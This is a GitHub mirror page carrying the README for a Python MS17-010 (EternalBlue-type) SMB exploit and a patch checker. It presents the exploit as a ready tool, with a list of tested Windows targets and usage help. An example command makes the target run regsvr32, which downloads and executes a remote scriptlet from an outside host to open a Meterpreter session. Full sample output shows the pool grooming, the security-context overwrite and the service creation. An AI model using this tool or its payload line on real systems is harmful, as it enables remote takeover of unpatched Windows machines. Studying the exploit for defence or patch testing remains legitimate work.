GithubHelp home page GithubHelp logo

k1p2y3 / ms17-010-python Goto Github PK

View Code? Open in Web Editor NEW

This project forked from mez-0/ms17-010-python

0.0 0.0 0.0 82 KB

MS17-010: Python and Meterpreter

Home Page: https://mez0.cc/posts/weaponised-worawit.html

License: MIT License

Python 64.20% Assembly 35.80%

ms17-010-python's Introduction

MS17-010: Python

All credit goes to Worawit:

Worawit Wang: GitHub

Worawit Wang: Twitter

Worawit Wang released a collection of Python exploits for MS17-010. These tools worked far more reliably than the Metasploit modules but didn't have much of a payload besides writing a pwned.txt to the C:/. However, Worawit Wang did add functionality for creating a service.

Korey McKinley wrote an article utilising that function to create a service which used regsvr32 to call back to Meterpreter and create a full Meterpreter connection. I'd never seen that path to exploitation, so I thought I'd modify zzz_exploit.py with Korey's logic and make the script more dynamic and user friendly.

However, the module Korey used in that blog article was not available in my version of Metasploit. It is now called web_delivery.

There are two pieces, zzz_checker.py and zzz_exploit.py. Both self-explanatory.

Exploit Usage

➜  MS17-010 git:(master) ✗ ./zzz_exploit.py --help                                                                                        
usage: zzz_exploit.py [-h] [-u] [-p] -t  [-c] [-P] [--version]

Tested versions:
1	Windows 2016 x64
2	Windows 10 Pro Vuild 10240 x64
3	Windows 2012 R2 x64
4	Windows 8.1 x64
5	Windows 2008 R2 SP1 x64
6	Windows 7 SP1 x64
7	Windows 2008 SP1 x64
8	Windows 2003 R2 SP2 x64
9	Windows XP SP2 x64
10	Windows 8.1 x86
11	Windows 7 SP1 x86
12	Windows 2008 SP1 x86
13	Windows 2003 SP2 x86
14	Windows XP SP3 x86
15	Windows 2000 SP4 x86

optional arguments:
  -h, --help        show this help message and exit
  -u , --user       Username to authenticate with
  -p , --password   Password for specified user
  -t , --target     Target for exploitation
  -c , --command    Command to add to service
  -P , --pipe       Pipe to connect to
  --version         show program's version number and exit
Example: python zzz_exploit -t 192.168.0.1-100 -c 'regsvr32 /s /n /u /i:http://192.168.0.1:9000/1EsrjpXH2pWdgd.sct scrobj.dll'

Sample output

> # python zzz_exploit.py -t 10.10.11.53                                                                                                                                                     
[08:50:24]  [INFO]:     TARGET: 10.10.11.53
[08:50:24]  [ACTION]:   CONNECTING TO TARGET...
[08:50:24]  [ACTION]:   GETTING TARGET OS...
[08:50:24]  [INFO]:     TARGET OS: Windows Server 2012 R2 Datacenter 9600
[08:50:24]  [ACTION]:   GETTING PIPE...
[08:50:25]  [INFO]:     USING PIPE: spoolss
[08:50:25]  [INFO]:     TARGET ARCHITECTURE: 64 bit
[08:50:25]  [INFO]:     FRAG SIZE: 0x20
[08:50:25]  [INFO]:     GROOM_POOL_SIZE: 0x5030
[08:50:25]  [INFO]:     BRIDE_TRANS_SIZE: 0xf90
[08:50:25]  [ERROR]:    No transaction struct in leak data
[08:50:25]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:26]  [ERROR]:    No transaction struct in leak data
[08:50:26]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:26]  [ERROR]:    No transaction struct in leak data
[08:50:26]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:26]  [INFO]:     CONNECTION: 0xffffe001c6257910
[08:50:26]  [INFO]:     SESSION: 0xffffc000fab68150
[08:50:26]  [INFO]:     FLINK: 0xffffc000fafcd098
[08:50:26]  [INFO]:     InParam: 0xffffc000faf9116c
[08:50:26]  [INFO]:     MID: 0x3903
[08:50:26]  [ERROR]:    unexpected alignment, diff: 0x3b098
[08:50:26]  [ERROR]:    LEAK FAILED! RETRYING...
[08:50:27]  [INFO]:     CONNECTION: 0xffffe001c6257910
[08:50:27]  [INFO]:     SESSION: 0xffffc000fab68150
[08:50:27]  [INFO]:     FLINK: 0xffffc000fafd9098
[08:50:27]  [INFO]:     InParam: 0xffffc000fafd316c
[08:50:27]  [INFO]:     MID: 0x3a03
[08:50:27]  [SUCCESS]:  SUCCESS CONTROLLING GROOM TRANSACTION
[08:50:27]  [ACTION]:   MODIFYING TRANS1 STRUCT FOR READ/WRITE
[08:50:27]  [ACTION]:   CREATING SYSTEM SESSION TO SMB...
[08:50:28]  [ACTION]:   OVERWRITING SESSION SECURITY CONTEXT
[08:50:28]  [INFO]:     Writing command to service:
[08:50:28]  [ACTION]:   OPENING SVCManager ON 10.10.11.53...
[08:50:28]  [ACTION]:   CREATING SERVICE PKfJ...
[08:50:28]  [ACTION]:   STARTING SERVICE PKfJ...
[08:50:29]  [ERROR]:    SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.                    
[08:50:29]  [ACTION]:   REMOVING SERVICE PKfJ...
[08:50:29]  [SUCCESS]:  FINISHED!

Checker Usage

usage: checker.py [-h] [-u] [-p] [-t] [-tf] [--version]

MS17-010 Checker script

optional arguments:
  -h, --help            show this help message and exit
  -u , --user           Username to authenticate with
  -p , --password       Password for specified user
  -t , --target         Target (IP, range, CIDR) to check for MS17-010
  -tf , --target-file   Read from file. Can interpret CIDR and IP.
  --version             show program's version number and exit

Example: python checker.py -t 192.168.0.1-100

Sample output

> # python checker.py -t 10.10.11.53                                                                                                                                                         
[08:37:25]  [INFO]: 	CONNECTED TO 10.10.11.53
[08:37:25]  [INFO]: 	TARGET OS: Windows Server 2012 R2 Datacenter 9600
[08:37:25]  [SUCCESS]: 	10.10.11.53 IS NOT PATCHED!
[08:37:25]  [ACTION]: 	CHECKING NAMED PIPES...
[08:37:25]  [SUCCESS]: 	spoolss: OK (64 bit)
[08:37:26]  [SUCCESS]: 	samr: OK (64 bit)
[08:37:26]  [SUCCESS]: 	netlogon: OK (64 bit)
[08:37:26]  [SUCCESS]: 	lsarpc: OK (64 bit)
[08:37:26]  [ERROR]: 	browser: STATUS_OBJECT_NAME_NOT_FOUND

ms17-010-python's People

Contributors

mez-0 avatar thegundy avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.